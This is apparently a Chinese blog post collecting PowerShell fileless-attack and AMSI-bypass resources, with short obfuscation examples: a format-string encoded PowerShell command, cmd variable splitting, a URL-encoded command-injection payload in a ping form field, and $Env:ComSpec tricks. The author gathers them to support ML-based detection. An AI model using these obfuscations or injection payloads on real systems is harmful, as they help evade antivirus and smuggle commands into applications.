powershell无文件攻击场景汇总
一些重要的链接:
powershell无文件挖矿 https://bbs.pediy.com/thread-253375.htm
无文件勒索 https://www.cnblogs.com/bonelee/p/15910502.html
powershell AMSI https://www.cnblogs.com/bonelee/p/16221887.html
各种绕过AMSI,分割,编码、xor、hex编码等 https://www.cnblogs.com/bonelee/p/16221958.html ==》另外,还提到了powershell数据采集
AMSI底层机制的探讨,如何绕过 https://www.cnblogs.com/bonelee/p/16220508.html
AMSI的介绍,有点老,可能不那么客观 https://www.cnblogs.com/bonelee/p/15924898.html
powershell 通过base64、utf8和分割绕过杀软 https://www.cnblogs.com/bonelee/p/15947640.html
无文件勒索 base64、xor编码绕过 https://www.cnblogs.com/bonelee/p/15910558.html
下面这些绕过场景,可以使用ML检测 https://www.cnblogs.com/bonelee/p/13768475.html
具体的示例(不全,要结合上面文章综合看):
将执行命令的字符串进行编码来绕过检测
1 | (("{7}{4}{0}{13}{1}{10}{12}{3}{2}{6}{5}{11}{8}{9}"-f 'V','C',' 6yB',' (','VCFipVCF+VCFconf','eC[4,26','ENv:comsP',' (','InVCF','VCF)','F)',',25]- jo',' hDY&','CF+VCFigV')).replAce(([ChAR]54+[ChAR]121+[ChAR]66),[StRing] [ChAR]36).replAce('VCF',[StRing][ChAR]39).replAce('hDY','|') |.( $verBOSEpREFEREnCE.tOSTRiNg()[1,3]+'x'-jOin'') |
将命令拆分和字符替换达到混淆效果:
1 2 3 4 5 6 7 8 9 10 11 12 | C:\Users>set lkf3=e&&set z6km=se&&set 0d=r&&set tXvd=n&&set 7B=t u&&call set AF=%tXvd%%lkf3%%7B%%z6km%%0d%&&call %AF%\\DESKTOP-NFBQJAR 的用户帐户-------------------------------------------------------------------------------Administrator DefaultAccount GuestWDAGUtilityAccount命令成功完成。C:\Users>echo %AF%net user |
BAT语法、Powershell 与certutil结合、PowerShell混淆以及Cmd混淆等命令执行
1 2 3 | ipaddress=127.0.0.1+%26+powershell+%22%28%27ip%27%2B%27conf%27%2B%27ig%27%29+%7C%26+%28%24ENv%3AcomsPeC%5B4%2C26%2C25%5D-joIn%27%27%29%22&submit=ping还原后:ipaddress=127.0.0.1+&+@^p^o^w^e^r^shell+C:\W*?w?\S*?32\?a?c.e?e&submit=ping |
1 | @^p^o^w^e^r^shell C:\W*?w?\S*?32\?a?c.e?e |
利用powershell$Env进行命令注入利用
powershell混淆:
执行ipconfig
1 | powershell "('ip'+'conf'+'ig') |& ($ENv:comsPeC[4,26,25]-joIn'')" |
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· DeepSeek 开源周回顾「GitHub 热点速览」
2021-06-21 恶意文件检测——开源样本下载
2021-06-21 无文件攻击——漏洞型攻击、灰色工具、潜伏型攻击
2021-06-21 Volatility取证使用笔记 ——这玩意就是在沙箱中运行 dump内存等信息
2019-06-21 Spark中Task,Partition,RDD、节点数、Executor数、core数目(线程池)、mem数
2018-06-21 卡尔曼滤波——基本假设(1)线性系统(2)高斯分布 根据x(t) 求解x(t+1)
2018-06-21 薅羊毛——促销优惠,所有优惠都被一个“人“独占!!!羊毛党却利用规则漏洞,通过黑产手段,以低成本的方式,模拟出成千上万虚拟用户领取活动福利,积少成多
2018-06-21 https://www.adminsub.net/tcp-udp-port-finder/14000 ——查找tcp端口对应的服务 可以看某些端口是否让恶意软件开启